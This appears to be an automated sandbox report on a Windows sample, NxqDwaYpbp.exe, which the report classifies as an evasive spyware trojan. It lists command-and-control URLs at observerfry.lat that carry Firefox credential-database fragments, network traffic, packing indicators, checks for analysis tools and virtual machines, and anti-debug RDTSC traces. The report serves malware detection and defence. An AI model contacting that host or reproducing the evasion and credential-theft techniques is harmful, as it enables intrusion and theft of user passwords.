                Source: NxqDwaYpbp.exe, 00000000.00000003.1423605757.0000000000A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/pi:&
                Source: NxqDwaYpbp.exe, 00000000.00000003.1498727425.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1490170370.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000002.1501552431.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/api
                Source: NxqDwaYpbp.exe, 00000000.00000003.1447393962.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1498727425.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1490170370.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000002.1501552431.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1426243060.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/api1tobv5.default-release/key4.dbPK
                Source: NxqDwaYpbp.exe, 00000000.00000003.1342789562.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/api:
                Source: NxqDwaYpbp.exe, 00000000.00000003.1447393962.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1498727425.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1490170370.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000002.1501552431.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1426243060.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/apin.txtPK
                Source: NxqDwaYpbp.exe, 00000000.00000003.1342789562.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/apip
                Source: NxqDwaYpbp.exe, 00000000.00000003.1399808791.0000000005510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: NxqDwaYpbp.exe, 00000000.00000003.1399808791.0000000005510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: NxqDwaYpbp.exe, 00000000.00000003.1423304374.0000000005404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
                Source: NxqDwaYpbp.exe, 00000000.00000003.1343570112.000000000542F000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343801651.000000000542C000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343631492.000000000542C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: NxqDwaYpbp.exe, 00000000.00000003.1343570112.000000000542F000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343801651.000000000542C000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343631492.000000000542C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: NxqDwaYpbp.exe, 00000000.00000003.1423304374.0000000005404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
                Source: NxqDwaYpbp.exe, 00000000.00000003.1399808791.0000000005510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
                Source: NxqDwaYpbp.exe, 00000000.00000003.1399808791.0000000005510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
                Source: NxqDwaYpbp.exe, 00000000.00000003.1399808791.0000000005510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: NxqDwaYpbp.exe, 00000000.00000003.1399808791.0000000005510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: NxqDwaYpbp.exe, 00000000.00000003.1399808791.0000000005510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49744 version: TLS 1.2

                System Summary

                barindex
                Source: NxqDwaYpbp.exeStatic PE information: section name:
                Source: NxqDwaYpbp.exeStatic PE information: section name: .idata
                Source: NxqDwaYpbp.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A7AE270_3_00A7AE27
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A7B4500_3_00A7B450
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A3FDAD0_3_00A3FDAD
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A3FDAD0_3_00A3FDAD
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A388D10_3_00A388D1
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A388D10_3_00A388D1
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A3FD5D0_3_00A3FD5D
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A3FD5D0_3_00A3FD5D
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A3FDAD0_3_00A3FDAD
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A3FDAD0_3_00A3FDAD
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A388D10_3_00A388D1
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A388D10_3_00A388D1
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A3FD5D0_3_00A3FD5D
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A3FD5D0_3_00A3FD5D
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A3FDAD0_3_00A3FDAD
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A3FDAD0_3_00A3FDAD
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A388D10_3_00A388D1
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A388D10_3_00A388D1
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A3FD5D0_3_00A3FD5D
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A3FD5D0_3_00A3FD5D
                Source: NxqDwaYpbp.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: NxqDwaYpbp.exeStatic PE information: Section: ZLIB complexity 0.9973779965753424
                Source: NxqDwaYpbp.exeStatic PE information: Section: zogjhcae ZLIB complexity 0.9944694915734583
                Source: NxqDwaYpbp.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: NxqDwaYpbp.exe, 00000000.00000003.1344190419.0000000005419000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1376901952.0000000005428000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1344519912.00000000053FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: NxqDwaYpbp.exeReversingLabs: Detection: 60%
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile read: C:\Users\user\Desktop\NxqDwaYpbp.exeJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: NxqDwaYpbp.exeStatic file information: File size 1858560 > 1048576
                Source: NxqDwaYpbp.exeStatic PE information: Raw size of zogjhcae is bigger than: 0x100000 < 0x19d800

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeUnpacked PE file: 0.2.NxqDwaYpbp.exe.450000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zogjhcae:EW;rqnwszwu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zogjhcae:EW;rqnwszwu:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: NxqDwaYpbp.exeStatic PE information: real checksum: 0x1c6aec should be: 0x1cb405
                Source: NxqDwaYpbp.exeStatic PE information: section name:
                Source: NxqDwaYpbp.exeStatic PE information: section name: .idata
                Source: NxqDwaYpbp.exeStatic PE information: section name:
                Source: NxqDwaYpbp.exeStatic PE information: section name: zogjhcae
                Source: NxqDwaYpbp.exeStatic PE information: section name: rqnwszwu
                Source: NxqDwaYpbp.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A7D1CF push ecx; ret 0_3_00A7D1D8
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A7E932 push esi; ret 0_3_00A7E93B
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A7DD0F push es; ret 0_3_00A7DD21
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A80764 pushfd ; iretd 0_3_00A80765
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A7C958 pushad ; retf 0_3_00A7C959
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A8871E push eax; retf 0_3_00A8886D
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A1E205 push ebp; iretd 0_3_00A1E220
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A1E205 push ebp; iretd 0_3_00A1E220
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A3989F push cs; iretd 0_3_00A398A0
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A3989F push cs; iretd 0_3_00A398A0
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A3989F push cs; iretd 0_3_00A398A0
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A3989F push cs; iretd 0_3_00A398A0
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A1E205 push ebp; iretd 0_3_00A1E220
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A1E205 push ebp; iretd 0_3_00A1E220
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A3989F push cs; iretd 0_3_00A398A0
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeCode function: 0_3_00A3989F push cs; iretd 0_3_00A398A0
                Source: NxqDwaYpbp.exeStatic PE information: section name: entropy: 7.98351967554791
                Source: NxqDwaYpbp.exeStatic PE information: section name: zogjhcae entropy: 7.954190174754569

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 4A7B57 second address: 4A7B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F593855EEE6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61BC7B second address: 61BC8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5938558A9Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61BC8C second address: 61BCC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 je 00007F593855EEE6h 0x0000000d pop ecx 0x0000000e jns 00007F593855EF05h 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61ACC6 second address: 61ACCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61AE1C second address: 61AE36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F593855EEF6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61B31B second address: 61B33C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F5938558AA8h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61D6BE second address: 61D6C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61D6C2 second address: 61D6C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61D6C8 second address: 61D739 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F593855EEECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jo 00007F593855EEF6h 0x00000011 push edi 0x00000012 jmp 00007F593855EEEEh 0x00000017 pop edi 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F593855EEE8h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 push esi 0x00000034 mov dl, C6h 0x00000036 pop esi 0x00000037 push 00000000h 0x00000039 movsx edi, bx 0x0000003c push D198E175h 0x00000041 pushad 0x00000042 jmp 00007F593855EEF6h 0x00000047 jng 00007F593855EEECh 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61D739 second address: 61D7A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 2E671F0Bh 0x0000000c mov dword ptr [ebp+122D275Ch], esi 0x00000012 push 00000003h 0x00000014 jmp 00007F5938558A9Bh 0x00000019 push 00000000h 0x0000001b push 00000003h 0x0000001d sbb cl, FFFFFFB4h 0x00000020 call 00007F5938558AA1h 0x00000025 jno 00007F5938558A9Ch 0x0000002b sub dword ptr [ebp+122D213Dh], eax 0x00000031 pop ecx 0x00000032 call 00007F5938558A99h 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a jng 00007F5938558A96h 0x00000040 jmp 00007F5938558AA7h 0x00000045 popad 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61D7A7 second address: 61D7AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61D7AD second address: 61D7B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61D7B1 second address: 61D7BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61D7BE second address: 61D7C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61D7C9 second address: 61D7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61D7CD second address: 61D844 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5938558A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5938558AA0h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007F5938558AA3h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 jmp 00007F5938558A9Eh 0x00000028 pop eax 0x00000029 mov edx, dword ptr [ebp+122D2AC9h] 0x0000002f lea ebx, dword ptr [ebp+1244954Ah] 0x00000035 mov esi, dword ptr [ebp+122D26A7h] 0x0000003b xchg eax, ebx 0x0000003c js 00007F5938558AA4h 0x00000042 push eax 0x00000043 pushad 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61D844 second address: 61D85B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F593855EEEFh 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61D942 second address: 61D948 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61D948 second address: 61D94E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61D94E second address: 61D952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61D952 second address: 61D98A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F593855EEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jnl 00007F593855EEF3h 0x00000015 jmp 00007F593855EEEDh 0x0000001a mov eax, dword ptr [eax] 0x0000001c jns 00007F593855EEF8h 0x00000022 push eax 0x00000023 push edx 0x00000024 jng 00007F593855EEE6h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61D98A second address: 61D98E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61D98E second address: 61D9A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F593855EEE8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeRDTSC instruction interceptor: First address: 61D9A2 second address: 61D9A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
